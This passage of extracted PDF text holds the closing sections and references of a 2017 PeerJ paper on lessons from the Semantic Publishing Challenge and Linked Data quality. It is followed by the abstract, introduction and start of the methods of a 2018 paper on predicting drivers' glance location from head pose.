1.3 used the individual pages to identify the proceedings, whereas Solution 1.2 and Solution 1.4 used the index page to identify the proceedings, this is the reason that there is so big difference in the number of Proceedings entities. The number of identified papers is also significantly different among the different solutions, but in the Persons case we observe the greatest variation in terms of numbers because of different practices of assigning URIs; a few solutions reuse URIs across different proceedings volumes, others do not4 . As far as Task 2 is concerned, solutions tend to omit certain subtasks and to optimize their performance on others due to the nature of the task—queries were quite heterogeneous, with a clear distinction, for instance, between the analysis of the structural components and of the textual content of the papers. For instance, in 2015, the best performing solution focused on precisely addressing the subtasks which were related to the document structure and totally omitted queries related to funding and ontologies, as shown in Table 10. Similarly, in 2016, certain solutions completely omitted the queries that were related to supplementary material or tables and pictures captions. Consequently, the dataset size, as well as the number of triples and entities significantly diverge among the solutions. Conclusion. The datasets’ heterogeneity is also evident in the amount and type of informa- tion each dataset provides. However, the more the solutions improve, the more the solutions converge at least regarding the number of retrieved and/or distinctly identified entities. Lessons learned from the solutions with respect to the evaluation In this section, we discuss the different solutions with respect to the dataset evaluation. Ranking Observation. For Task 1, in 2015 the performance ranking of the three tools evolved from 2014 has not changed but their performance has improved except for Solution 1.1, which improved precision but recall remain the same. Disregarding the two queries that were new in 2015, Solution 1.1, which had won the best performance award in 2014, performs almost as well as Solution 1.4. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 38/47 https://peerj.com http://ceur-ws.org/Vol-360/#ChristophiLange http://ceur-ws.org/Vol-1184/#ChristophiLange http://dx.doi.org/10.7717/peerj-cs.105 The trend was slightly different for Task 2: all tools participating in the Challenge for the second time increased their performance, but the overall ranking changed. Solution 2.4 obtained a higher score than Solution 2.2 in 2016, contrarily to what happened in 2015. The position of Solution 2.3 was stable. Conclusion. Continuity helps participants to improve their tools; the overall ranking keeps stable if the tasks (and queries) are kept stable; adjustments to the tasks (and queries) may impact the ranking, favoring one team more than another. New and legacy solutions Observation. Task 1 participants both in 2014 and 2015 had an improved version of different aspects of their solution, which resulted in correspondingly improved versions of the final dataset. The new Solution 1.4, which introduced a fundamentally new approach, achieved equally good results as the best solution of 2014. The same trend was evident in Task 2, with a general improvement of all solutions that were re-proposed for the second year (2015 and 2016). Conclusion. Legacy solutions might be able to improve and bring stable and good results, however there is still room for improvement and mainly for fundamentally new ideas that surpass problems that legacy solutions cannot deal with. Equal chances Observation. Solution 1.1, the winners of Task 1 in 2014, participated in 2015 with an improved version but did not win. The 2015 winner was a new tool with a brand new approach (Solution 1.4). The same happened for Task 2: in 2016, one winner (Solution 2.7) was a brand-new solution, the other one (Solution 2.2) was an extension and improvement of a legacy solution but did not win the year before. Conclusion. The winners were not the same in subsequent versions of the challenge: creativity won. DISCUSSION: CHALLENGE IMPACT ON LINKED DATA QUALITY In the ‘Introduction’ section we motivated the Semantic Publishing Challenge as a means of producing high-quality Linked Data. In this section, we assess the potential impact of the challenge on the quality of the Linked Data produced. To be more precise, the quality of the Linked Data produced by the tools submitted has been assessed by comparing the output of a number of prescribed queries against our gold standard and measuring precision and recall, as explained in ‘Tasks evaluation’ section. Assessing the quality of Linked Data by running queries over it is a common approach, as the comparison of tools by Zaveri et al. (2016) confirms, whose recent survey we refer to for a comprehensive review of the state of the art regarding Linked Data quality assessment. Therefore, a challenge designed as the Semantic Publishing Challenge could act as a means to assess the Linked Data quality, and, the better the results, the higher the Linked Data quality is expected to be. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 39/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 The specific quality metrics that our evaluation setup assesses can be connected to the general quality dimensions (accessibility, intrinsic, contextual and representational) and certain of their corresponding metrics, as they are identified by Zaveri et al. (2016). Moreover, few other quality dimensions’ metrics that are not covered by the challenge’s evaluation are assessed in the frame of this review. Note that some metrics are applicable for all tasks, whereas others are only for a certain task. Accessibility dimensions The accessibility dimensions involve aspects related to the Linked Data access, authenticity and retrieval (Zaveri et al., 2016). Our challenge required participants to make their data available, forcing this way the solutions to cover the availability dimension. Making the data available as an RDF dump was the minimum requirement set by the challenge, covering this way the accessibility of the RDF dumps metric. Participants were also encouraged to publish their data via other Triple Pattern Fragment (TPF) interfaces, such as SPARQL endpoints, but assessing its availability was not part of the challenge’s evaluation. Moreover, participants were encouraged to publish their data using a certain license, without being a requirement though, boosting this way the licensing dimension (the corresponding detailed discussion is available in ‘License’). While the aforementioned referred to all challenge’s tasks, the interlinking dimension was only promoted by Task 3, which, after all, is its actual goal. Overall, even though the submitted solutions only made their datasets available as RDF dumps and did not specify the license, the challenge achieved to enable solutions to achieve the minimum requirement of making the produced datasets accessible. It is evident that, if the challenge had turned high values w.r.t. each of the aforementioned metrics mandatory, the produced dataset accessibility would have been increased. Intrinsic dimensions According to Zaveri et al. (2016), the intrinsic dimensions focus on whether the information correctly, compactly and completely represents the real world and is logically consistent in itself. As the Semantic Publishing Challenge requires SPARQL queries to be executed against the Linked Data produced by the different solutions, the syntactic validity of the dataset is a prerequisite, boosting this way the metrics for syntax error free documents and the absence of malformed datatypes. While our challenge evaluation covers well the syntactic validity, the semantic accuracy is not evaluated. Nevertheless, the metric which is related to the misuse of properties is discussed and assessed in a qualitative way in the ‘Annotations’ section of this paper, but it is not assessed quantitatively. Similarly, the population completeness, i.e., the percentage of real-world objects of a particular type that are represented in a dataset, is indirectly evaluated on the side. Namely, it is not thoroughly assessed if all real-world entities appear, but to successfully answer the evaluation queries, the population completeness is prerequisite. Moreover, a comparative evaluation of the population completeness is performed in this work (see more detailed discussion at the ‘Coverage’ section and Tables 7, 8). Last, even though the solutions’ dataset consistency dimension could have been evaluated and shed more light to their quality, it was not done by any of the challenge’s series so far. All in all, as the challenge was not focused on Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 40/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 assessing the dataset quality, certain metrics of the intrinsic dimension were not covered intentionally, others were indirectly assessed, while a few others were only discussed in this paper. Nevertheless, if it had been intended, the challenge could have covered even more metrics of the intrinsic dimension and could have reinforced the datasets quality even more. Contextual dimensions The contextual dimensions highly depend on the context of the task at hand. In the case of relevancy dimension, the Semantic Publishing Challenge did not perform any relevant evaluation. Nevertheless, in this paper the coverage metric is addressed. To be more precise, in the ‘Coverage’ section, the coverage is thoroughly discussed. The Semantic Publishing Challenge does contribute to the timeliness dimension. To be more precise, thanks to its continuity, it is assured that at least every year the challenge is organized, a new dataset for the underlying CEUR-WS.org data is generated, boosting the freshness metric. In particular the final extraction has to be made from the evaluation dataset published a few days before the final submission deadline. As a conclusion, the challenge succeeded in indirectly promoting the coverage and timeliness dimensions; however, there is potential for other dimensions to be covered as well. Representational dimension The representational dimension captures aspects related to the data design (Zaveri et al., 2016). As far as the interoperability dimension is concerned, the Semantic Publishing Challenge promotes the reuse of existing terms and vocabularies and, as shown in Table 4 and discussed in the ‘Annotations’ section, the Semantic Publishing Challenge achieves its goal of promoting the re-use of existing vocabularies, even though the corresponding metric is not evaluated automatically. Moreover, thanks to Task 3, the Semantic Publishing Challenge also promotes the re-use of existing terms. Even though it failed to attract participation, it is proven that such a task contributes into increasing the overall dataset quality. Thus, the challenge enables the produced datasets to cover even the representational quality dimension. CONCLUSIONS One of the objectives of the Semantic Publishing Challenge is to produce Linked Data that contributes to improving scholarly communication. Nevertheless, the lessons learned from organizing this challenge are not only applicable in the case of a challenge on Semantic Publishing but in the case of other challenges too. Therefore, this work shed light not only on the three editions of this challenge organized by ourselves and distilled lessons learned from our experience, but we have also validated them against other challenges and concluded on general best practices for organizing such challenges. In a nutshell, continuity both in terms of the dataset and in terms of the tasks is important. Nevertheless, tasks should remain distinct, but they should refer to the same training and evaluation dataset, while participants’ feedback should be taken into consideration to define or refine the tasks. Regarding the output, the larger the evaluation dataset is and the less overlapping with the training dataset, the best it is for verifying high coverage. The sooner the evaluation Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 41/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 tool is made available, the better it is for the quality of the final output. Finally, it is a critical incentive for the participants to know how their output is intended to be reused. Besides the challenge’s organizational aspects, we looked for evidence from the solutions proposed by the participants. Therefore, we analyzed them, reported our observations and came up with different conclusions related to Linked Data publishing practices followed by different participants. There are several positive aspects, among them the high participation and the quality of the produced results. This work allowed us to share those observations on semantifying scholarly data, using different ontological models, refining and extending existing datasets. Even though the Semantic Publishing Challenge focuses on scholarly data, the conclusions we draw based on our analysis are of interest for the entire community that publishes Linked Data. The possibility of sharing knowledge and solutions among participants was another key factor of the Semantic Publishing Challenge. In a nutshell, most solutions relied on generic and open-sourced tools, which allows and enables their reuse for corresponding cases. Solutions, and thus the tools that produce them, have improved from one edition to the other. Even though different methodologies were followed, there are certain prevailing approaches—based on structure/layout or on linguistics—which were instantiated in different ways. Despite the fact that tools diverge, the produced data model and final annotations converge, as solutions become more mature from one edition to the other, while well-known vocabularies are reused. Last, we assessed how the challenge’s organization reflects on the submitted solutions’ output, namely how the challenge’s organization affects the datasets’ quality. We showed that indeed the challenge’s organization may have a positive impact on increasing the quality of the Linked Data produced. ADDITIONAL INFORMATION AND DECLARATIONS Funding Research activities described in this paper were funded by Ghent University, iMinds, the Institute for the Promotion of Innovation by Science and Technology in Flanders (IWT), the Research Foundation—Flanders (FWO) and the European Union under grant agreement no. 643410 (OpenAIRE2020) and others. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Ghent University, imec. Flanders Innovation & Entrepreneurship (VLAIO). European Union: 643410. Competing Interests The authors declare there are no competing interests. Christoph Lange is an employee of Enterprise Information Systems. Anastasia Dimou and Erik Mannens are employees of imec. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 42/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Author Contributions • Anastasia Dimou, Sahar Vahdati, Angelo Di Iorio and Christoph Lange conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Ruben Verborgh wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Erik Mannens reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: (1) SemPub2016: https://github.com/ceurws/lod/wiki/SemPub2016 (2) SemPub2015: https://github.com/ceurws/lod/wiki/SemPub2015 (3) SemPub2014: http://challenges.2014.eswc-conferences.org/index.php/SemPub. REFERENCES Ahmad R, Afzal MT, Qadir MA. 2016. Information extraction for PDF sources based on rule-based system using integrated formats. In: Sack H, Dietze S, Tordai A, Lange C, eds. The semantic web: ESWC 2016 Challenges, Anissaras, Crete, Greece, May 29–June 2, 2016, revised selected papers. Communications in computer and information science, no. 641, Cham: Springer International Publishing. Bertin M, Atanassova I. 2014. Extraction and characterization of citations in scientific papers. In: Presutti V, Stankovic M, Cambria E, Cantador I, Di Iorio A, Di Noia T, Lange C, Reforgiato Recupero D, Tordai A, eds. Semantic web evaluation Challenge: SemWebEval 2014 at ESWC 2014, Anissaras, Crete, Greece, May 25–29, 2014, revised selected papers. Communications in computer and information science, no. 457. Cham: Springer International Publishing, 120–126. Catapano T. 2010. TaxPub: an extension of the NLM/NCBI journal publishing DTD for taxonomic descriptions. Journal Article Tag Suite Conference (JATS-Con) Proceedings 2010. Clough P, Sanderson M. 2013. Evaluating the performance of information retrieval systems using test collections. Information Research 18(2):247–375. D’Aquin M, Drachsler H, Dietze S, Herder E, Parodi E, Guy M. 2014. Lessons learnt from LinkedUp—linking web data for education. In: Multidisciplinary academic conference on education, teaching and e-learning. 80–86. Di Iorio A, Lange C, Dimou A, Vahdati S. 2015. Semantic publishing challenge— assessing the quality of scientific output by information extraction and interlinking. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges, Portorož, Slovenia, May 31–June 4, 2015, Revised Selected Papers. Commu- nications in computer and information science, no. 548. Cham: Springer International Publishing, 65–80. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 43/47 https://peerj.com https://github.com/ceurws/lod/wiki/SemPub2016 https://github.com/ceurws/lod/wiki/SemPub2015 http://challenges.2014.eswc-conferences.org/index.php/SemPub http://dx.doi.org/10.7717/peerj-cs.105 Di Noia T, Cantador I, Ostuni VC. 2014. Linked open data-enabled recommender systems: ESWC 2014 challenge on book recommendation. In: Presutti V, Stankovic M, Cambria E, Cantador I, Di Iorio A, Di Noia T, Lange C, Reforgiato Recupero D, Tordai A, eds. Semantic web evaluation challenge: SemWebEval 2014 at ESWC 2014, Anissaras, Crete, Greece, May 25–29, 2014, revised selected papers. Communications in computer and information science, no. 457, Cham: Springer International Publishing, 129–143. Dimou A, Di Iorio A, Lange C, Vahdati S. 2016. Semantic publishing challenge— assessing quality scientific output its ecosystem. In: Sack H, Dietze S, Tordai A, Lange C, eds. The semantic web: ESWC 2016 Challenges, Anissaras, Crete, Greece, May 29– June 2, 2016, Revised Selected Papers. Communications in computer and information science, no. 641. Cham: Springer International Publishing. Dimou A, Vander Sande M, Colpaert P, De Vocht L, Verborgh R, Mannens E, Van de Walle R. 2014. Extraction and semantic annotation of workshop proceedings in HTML Using RML. In: Presutti V, Stankovic M, Cambria E, Cantador I, Di Iorio A, Di Noia T, Lange C, Reforgiato Recupero D, Tordai A, eds. Semantic web evaluation challenge: SemWebEval 2014 at ESWC 2014, Anissaras, Crete, Greece, May 25–29, 2014, Revised Selected Papers. Communications in computer and information science, no. 457. Cham: Springer International Publishing, 114–119. Freitas A, Unger C. 2015. The schema-agnostic queries (SAQ-2015) semantic web challenge: task description. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. semantic web evaluation challenges: second SemWebEval challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 191–198. Heyvaert P, Dimou A, Verborgh R, Mannens E, Van de Walle R. 2015. Semantically annotating CEUR-WS workshop proceedings with RML. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval Challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 165–176. Klampfl S, Kern R. 2015. Machine learning techniques for automatically extracting contextual information from scientific publications. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval Challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 105–116. Klampfl S, Kern R. 2016. Reconstructing the logical structure of a scientific publication using machine learning. In: Sack H, Dietze S, Tordai A, Lange C, eds. The semantic web: ESWC 2016 Challenges, Anissaras, Crete, Greece, May 29–June 2, 2016, Revised Selected Papers. Communications in computer and information science, no. 641. Cham: Springer International Publishing. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 44/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Kolchin M, Cherny E, Kozlov F, Shipilo A, Kovriguina L. 2015. CEUR-WS-LOD: conversion of CEUR-WS workshops to linked data. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval Challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 142–152. Kolchin M, Kozlov F. 2014. A template-based information extraction from web sites with unstable markup. In: Presutti V, Stankovic M, Cambria E, Cantador I, Di Iorio A, Di Noia T, Lange C, Reforgiato Recupero D, Tordai A, eds. Semantic web evaluation challenge: SemWebEval 2014 at ESWC 2014, Anissaras, Crete, Greece, May 25–29, 2014, Revised Selected Papers. Communications in computer and information science, no. 457. Cham: Springer International Publishing, 89–94. Kovriguina L, Shipilo A, Kozlov F, Kolchin M, Cherny E. 2015. Metadata extraction from conference proceedings using template-based approach. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval Challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 153–164. Lange C, Di Iorio A. 2014. Semantic publishing challenge—assessing the quality of scientific output. In: Presutti V, Stankovic M, Cambria E, Cantador I, Di Iorio A, Di Noia T, Lange C, Reforgiato Recupero D, Tordai A, eds. Semantic web evaluation challenge: SemWebEval 2014 at ESWC 2014, Anissaras, Crete, Greece, May 25–29, 2014, Revised Selected Papers. Communications in computer and information science, no. 457. Cham: Springer International Publishing, 61–76. Lopez V, Unger C, Cimiano P, Motta E. 2013. Evaluating question answering over linked data. Web Semantics: Science Services and Agents on the World Wide Web 21:3–13 DOI 10.1016/j.websem.2013.05.006. Milicka M, Burget R. 2015. Information extraction from web sources based on multi- aspect content analysis. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 81–92. Miller HG, Mork P. 2013. From data to decisions: a value chain for big data. IT Profes- sional 15(1):57–59 DOI 10.1109/MITP.2013.11. Nuzzolese AG, Gentile AL, Presutti V, Gangemi A, Garigliotti D, Navigli R. 2015. Open knowledge extraction challenge. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communi- cations in computer and information science, no. 548. Cham: Springer International Publishing, 3–15. Nuzzolese AG, Peroni S, Recupero DR. 2016. ACM: article content miner for assessing the quality of scientific output. In: Sack H, Dietze S, Tordai A, Lange C, eds. The Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 45/47 https://peerj.com http://dx.doi.org/10.1016/j.websem.2013.05.006 http://dx.doi.org/10.1109/MITP.2013.11 http://dx.doi.org/10.7717/peerj-cs.105 semantic web: ESWC 2016 challenges, Anissaras, Crete, Greece, May 29–June 2, 2016, revised selected papers. Communications in computer and information science, no, 641. Cham: Springer International Publishing. Nuzzolese AG, Peroni S, Reforgiato Recupero D. 2015. MACJa: metadata and citations jailbreaker. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 117–128. Ramesh SH, Dhar A, Kumar RR, Anjaly V, Sarath K, Pearce J, Sundaresan K. 2016. Automatically identify and label sections in scientific journals using conditional random fields. In: Sack H, Dietze S, Tordai A, Lange C, eds. The semantic web: ESWC 2016 challenges, Anissaras, Crete, Greece, May 29–June 2, 2016, revised selected papers. Communications in computer and information science, no. 641. Cham: Springer International Publishing. Reforgiato Recupero D, Cambria E. 2014. ESWC’14 challenge on concept-level sentiment analysis. In: Presutti V, Stankovic M, Cambria E, Cantador I, Di Iorio A, Di Noia T, Lange C, Reforgiato Recupero D, Tordai A, eds. Semantic web evaluation challenge: SemWebEval 2014 at ESWC 2014, Anissaras, Crete, Greece, May 25–29, 2014, revised selected papers. Communications in computer and information science, no. 457. Cham: Springer International Publishing, 3–20. Reforgiato Recupero D, Dragoni M, Presutti V. 2015. ESWC 15 challenge on concept- level sentiment analysis. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, Revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 211–222. Ronzano F, Del Bosque GC, Saggion H. 2014. Semantify CEUR-WS proceedings: towards the automatic generation of highly descriptive scholarly publishing linked datasets. In: Presutti V, Stankovic M, Cambria E, Cantador I, Di Iorio A, Di Noia T, Lange C, Reforgiato Recupero D, Tordai A, eds. Semantic web evaluation challenge: SemWebEval 2014 at ESWC 2014, Anissaras, Crete, Greece, May 25–29, 2014, revised selected papers. Communications in computer and information science, no. 457. Cham: Springer International Publishing, 83–88. Ronzano F, Fisas B, Del Bosque GC, Saggion H. 2015. On the automated generation of scholarly publishing linked datasets: the case of CEUR-WS proceedings. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A, eds. Semantic web evaluation challenges: second SemWebEval challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 177–188. Sateli B, Witte R. 2015. Automatic construction of a semantic knowledge base from ceur workshop proceedings. In: Gandon F, Cabrio E, Stankovic M, Zimmermann A Sack H, Dietze S, Tordai A, Lange C, eds. Semantic web evaluation challenges: second SemWebEval challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 46/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 revised selected papers. Communications in computer and information science, no. 548. Cham: Springer International Publishing, 129–141. Sateli B, Witte R. 2016. An automatic workflow for the formalization of scholarly articles’ structural and semantic elements. In: Sack H, Dietze S, Tordai A, Lange C, eds. The semantic web: ESWC 2016 challenges, Anissaras, Crete, Greece, May 29–June 2, 2016, revised selected papers. Communications in computer and information science, no. 641. Cham: Springer International Publishing. Schmachtenberg M, Bizer C, Paulheim H. 2014. Adoption of the linked data best practices in different topical domains. In: Mika P, Tudorache T, Bernstein A, Welty C, Knoblock C, Vrandečić D, Groth P, Noy N, Janowicz K, Goble C, eds. The semantic web—ISWC 2014: 13th international semantic web conference, Riva del Garda, Italy, October 19–23, 2014. Proceedings, part I. Cham: Springer International Publishing, 245–260. Shotton D. 2009. Semantic publishing: the coming revolution in scientific journal publishing. Learned Publishing 22(2):85–94 DOI 10.1087/2009202. Tkaczyk D, Bolikowski Ł. 2015. Extracting contextual information from scientific literature using CERMINE system. In: Gandon F, Cabrio E, Stankovic M, Zim- mermann A, eds. Semantic web evaluation challenges: second SemWebEval challenge at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers. communications in computer and information science, no. 548. Cham: Springer International Publishing, 93–104. Unger C, Forascu C, Lopez V, Ngomo A-CN, Cabrio E, Cimiano P, Walter S. 2015. Question Answering over Linked Data (QALD-5). In: CLEF 2015 Working Notes.. Vahdati S, Dimou A, Lange C, Di Iorio A. 2016. Semantic publishing challenge: bootstrapping a value chain for scientific data. In: Gonzalez-Beltran A, Osborne F, Peroni S, eds. Semantics, analytics, visualisation: enhancing scholarly data. Lecture notes in computer science. Heidelberg: Springer. Williams JD, Raux A, Henderson M. 2016. The dialog state tracking challenge series: a review. Dialoge & Discourse 7(3):4–33 DOI 10.5087/dad.2016.30. Zaveri A, Rula A, Maurino A, Pietrobon R, Lehmann J, Auer S. 2016. Quality assessment for linked data: a survey. Semantic Web Journal 7(1):63–93. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 47/47 https://peerj.com http://dx.doi.org/10.1087/2009202 http://dx.doi.org/10.5087/dad.2016.30 http://dx.doi.org/10.7717/peerj-cs.105 work_4dlhwsemczhz7ptump36z3mt2u ---- Submitted 1 August 2016 Accepted 23 January 2018 Published 19 February 2018 Corresponding author Joonbum Lee, joonbum@mit.edu Academic editor Ana Maguitman Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.146 Copyright 2018 Lee et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Investigating the correspondence between driver head position and glance location Joonbum Lee1, Mauricio Muñoz1,2,3, Lex Fridman1, Trent Victor4, Bryan Reimer1 and Bruce Mehler1 1 AgeLab and New England University Transportation Center, Massachusetts Institute of Technology, Cambridge, MA, United States of America 2 Technical University of Munich, Munich, Germany 3 University of Augsburg, Augsburg, Germany 4 SAFER Vehicle and Traffic Safety Center, Chalmers, Göteborg, Sweden ABSTRACT The relationship between a driver’s glance orientation and corresponding head rotation is highly complex due to its nonlinear dependence on the individual, task, and driving context. This paper presents expanded analytic detail and findings from an effort that explored the ability of head pose to serve as an estimator for driver gaze by connecting head rotation data with manually coded gaze region data using both a statistical analysis approach and a predictive (i.e., machine learning) approach. For the latter, classification accuracy increased as visual angles between two glance locations increased. In other words, the greater the shift in gaze, the higher the accuracy of classification. This is an intuitive but important concept that we make explicit through our analysis. The highest accuracy achieved was 83% using the method of Hidden Markov Models (HMM) for the binary gaze classification problem of (a) glances to the forward roadway versus (b) glances to the center stack. Results suggest that although there are individual differences in head-glance correspondence while driving, classifier models based on head-rotation data may be robust to these differences and therefore can serve as reasonable estimators for glance location. The results suggest that driver head pose can be used as a surrogate for eye gaze in several key conditions including the identification of high-eccentricity glances. Inexpensive driver head pose tracking may be a key element in detection systems developed to mitigate driver distraction and inattention. Subjects Human-Computer Interaction, Data Mining and Machine Learning Keywords Head movements, Glance classification, Head-glance correspondence, Driver distraction INTRODUCTION Eye movements have long been studied in the context of driver behavior, attention management, and task related visual demand assessment (e.g., Wierwille, 1993). As driver distraction has become identified as one of the leading causes of vehicle crashes (National Highway Traffic Safety Administration, 2015; Statistic Brain, 2017), eye-tracking systems have been employed in numerous studies in the field of driving safety and driver visual attention allocation (e.g., Wang et al., 2014). Evaluating objective data on glance behavior, such as glance location (e.g., glance to the road, glance away from the road, etc.) and duration (e.g., mean of single glance duration, total glance time to a specific location, How to cite this article Lee et al. (2018), Investigating the correspondence between driver head position and glance location. PeerJ Com- put. Sci. 4:e146; DOI 10.7717/peerj-cs.146 https://peerj.com mailto:joonbum@mit.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.146 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.146 etc.) has been seen as key to understanding driver interaction with in-vehicle devices and to estimate potential crash risks. For example, several studies show that crash and near-crash risk increased as the duration of off-road glances increased (e.g., Liang, Lee & Yekhshatyan, 2012; Victor et al., 2015). However, traditional technologies for automated eye-tracking have been susceptible to data quality issues (Ahlstrom et al., 2012; Sodhi, Reimer & Llamazares, 2002) and difficult to reliably use in production systems, especially for on-road experiments and naturalistic driving studies. For these reasons, research on the correspondence between eye and head movement (which is relatively more robust to track in the presence of occlusion and movement artifact) have been conducted, and results suggest that head pose data may be useful as a surrogate for eye-glance data (e.g., Talamonti et al., 2013; Talamonti, Kochhar & Tijerina, 2014; Tawari, Chen & Trivedi, 2014; Vicente et al., 2015), although there may be issues as well. Talamonti and colleagues (2013) found a low likelihood (65% or less) of head turns when glancing to the instrument panel and rearview mirror, and high likelihood (93% or more) when glancing to the left mirror, center console, and center stack. Also, Talamonti, Kochhar & Tijerina (2014) suggested that driver-specific thresholds need to be set in order to meaningfully use head yaw data as a glance predictor. These studies utilized a fixed-base driving simulator to collect data and applied a simple classifier to understand the relationship between head turns and glance locations. Tawari, Chen & Trivedi (2014) and Vicente et al. (2015) applied more advanced approaches, extracting facial features and landmarks to estimate gaze regions while driving a real car, but they did not focus on driver distraction aspects (e.g., completing secondary tasks while driving), which have critical safety implications. The present paper presents expanded analytic detail and findings from an effort that was developed to further explore whether head-rotation data can be used as a surrogate for eye-glance behaviors in an on-road environment where eye-tracking is more challenging compared to laboratory experiments (Muñoz et al., 2015). This analysis took advantage of glance and head rotation data drawn from a study conducted by the Virginia Tech Transportation Institute (Transportation Research Board, 2013); the glance data were manually coded for glance region and temporal points where glance orientation transition from one location to another by two independent coders (and a senior research associated mediated if disagreement occurred between two coders), and head rotation data were estimated from manually extracted facial landmarks (details are described in the ‘Method’ section). This study utilized the data to: (a) begin developing a deeper understanding of how drivers’ rotate their heads, (b) generate input features for classifiers that predicted glance allocations, and (c) investigate individual differences in head-glance correspondence. Based on the literature noted above, it was expected that head-rotation data could be used to predict some, but not all, glances away from the road. In the field of driver distraction evaluation, glances away from the road and glances to task-related areas such as displays are particularly important to measure (Driver Focus-Telematics Working Group, 2006; National Highway Traffic Safety Administration, 2015). Therefore, we tested whether head rotation can predict glances to the forward road, to the vehicle’s center stack (e.g., climate controls, infotainment display), and to other key locations in the vehicle (e.g., mirrors, see Li & Busso, 2016). Subsequent efforts then evaluated the degree to which machine learning Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 2/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 algorithms could predict glances to closer and farther regions of the vehicle interface and to evaluate the degree to which individual differences influence behavior. The main objective of this study is to investigate the use of head pose data to predict glance location with on-road driving data. To achieve this, we analyze the data using principal component analysis (PCA) and machine learning techniques by considering several factors that may affect model performance and interpretation. Classification performance is a direct result of three principal factors: (a) the quantity and ‘‘shape’’ (e.g., uneven class membership, skewness, etc.) of the data, (b) the modeling methodology utilized, and (c) the descriptive potential (i.e., signal power) of the selected features. We consider results based on the original ‘‘skewed’’ dataset, which is characterized by a heavily uneven distribution of samples for each glance type (95% of all glances were forward glances), as well as a subset of the original dataset with an equal amount of glance samples for each type of glance. Furthermore, in terms of model selection, there is a wide range of classifiers that could be selected from. As a secondary assessment of the viability of different classification approaches, four classifiers were examined to cover a wide range of data interpretation paradigms. These steps allow us to reasonably begin to isolate the descriptive potential of the head pose signal and a set of classification approaches that appear most promising for future endeavors targeting larger more sophisticated datasets or systems for real-time state assessment. Subsequent sections describe details of the data and model development. METHODS As previously noted, this study is a secondary analysis of a subset of data collected by the Virginia Tech Transportation Institute (VTTI) in support of the Strategic Highway Research Program 2 (SHRP 2) naturalistic driving study (Transportation Research Board, 2013). The data were provided to the MIT AgeLab under an IRB approved data sharing agreement. A number of the following details concerning the source dataset are drawn from a technical report (J Sudweeks, A 